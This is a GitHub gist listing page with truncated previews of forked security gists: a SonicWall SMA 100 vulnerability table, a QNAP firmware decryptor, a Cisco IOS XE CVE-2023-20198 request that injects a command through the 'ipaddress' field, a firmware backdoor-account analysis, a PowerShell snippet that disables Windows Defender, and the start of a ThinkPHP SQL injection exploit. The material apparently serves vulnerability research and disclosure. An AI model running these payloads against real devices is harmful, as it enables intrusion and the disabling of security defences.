soap imjdl

@imjdl
imjdl / sonicwall_sma_100_0_day.md
Created May 15, 2025 10:21 — forked from jbaines-r7/sonicwall_sma_100_0_day.md
Sonicwall SMA 100 Series 0-day

The following issues are unpatched vulnerabilities in SonicWall's SMA 100 Series. Testing was done on an SMA 500v running firmware versions 9.0.0.11-31sv and 10.2.1.1-19sv. Because these two versions are substantially different under the hood, not all of the issues affect both versions. As such, for each issue I'll call out specifically which versions are affected. Note that no testing was done on the 10.2.0.x version line.

Summary

| Vector | Auth | Affected | Component | Vulnerability | CVSS Vector |
| --- | --- | --- | --- | --- | --- |
| Remote | Unauthenticated | 10.2.1.1-19sv | httpd | Stack-based buffer overflow | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Remote | Authenticated | Both | Multiple cgi | Command injection | AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H |
| Remote | Unauthenticated | 10.2.1.1-19sv | sonicfiles | File upload path traversal | AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L |
| Remote | Unauthenticated | Both | sonicfiles | CPU exhaustion | AV:N |
imjdl / qnap-qts-fw-cryptor.py
Created May 10, 2024 14:18 — forked from ulidtko/qnap-qts-fw-cryptor.py
QNAP QTS firmware encryptor/decryptor.
#!/usr/bin/env python3
import os, sys
import argparse
import struct
from functools import reduce
"""
QNAP QTS firmware encryptor/decryptor.
Based on https://pastebin.com/KHbX85nG
imjdl / gist:779b64aadbaa5382869c81c4b7664698
Created November 7, 2023 10:54 — forked from rashimo/gist:a0ef01bc02e5e9fdf46bc4f3b5193cbf
Chain of Cisco IOS XE CVE-2023-20198 commands
## a POST request as:
POST /webui/rest/softwareMgmt/installAdd HTTP/1.1
{"filePath": "abc/aaa", "fileSystem": "", "ipaddress": "1:1:1:;id>/bootflash/PaJbOLOT;#", "mode": "tftp", "operation_type": "SMU"}
## then another command with the POC technique:
dir bootflash: | include PaJbOLOT
imjdl / Vmg3312 B10b Firmware 1.00(AAPP.7) backdoor account
Created December 29, 2020 04:29 — forked from numanturle/Vmg3312 B10b Firmware 1.00(AAPP.7) backdoor account
Vmg3312 B10b Firmware Vmg3312 B10b Firmware backdoor account
root@bitforbyte:~/xxx# binwalk 100AAPP7D0.bin
DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
131072 0x20000 JFFS2 filesystem, big endian
JFFS2 filesystem extract
total 1492
1049502 drwxr-xr-x 18 root root 4096 Oct 27 23:33 .
imjdl / doh.ps1
Created May 8, 2020 03:39 — forked from tyranid/doh.ps1
Something or other.
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)'
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline
Register-ScheduledTask -TaskName 'TestTask' -Action $a
$svc = New-Object -ComObject 'Schedule.Service'
$svc.Connect()
$user = 'NT SERVICE\TrustedInstaller'
$folder = $svc.GetFolder('\')
imjdl / exp.py
Created October 19, 2018 07:55
ThinkPHP5.0.14-ThinkPHP5.0.15 SQL injection vulnerability exploit
#!/usr/bin/env python3
# coding: utf-8
import sys
import requests
import time
from threading import Thread
from threading import Lock
import argparse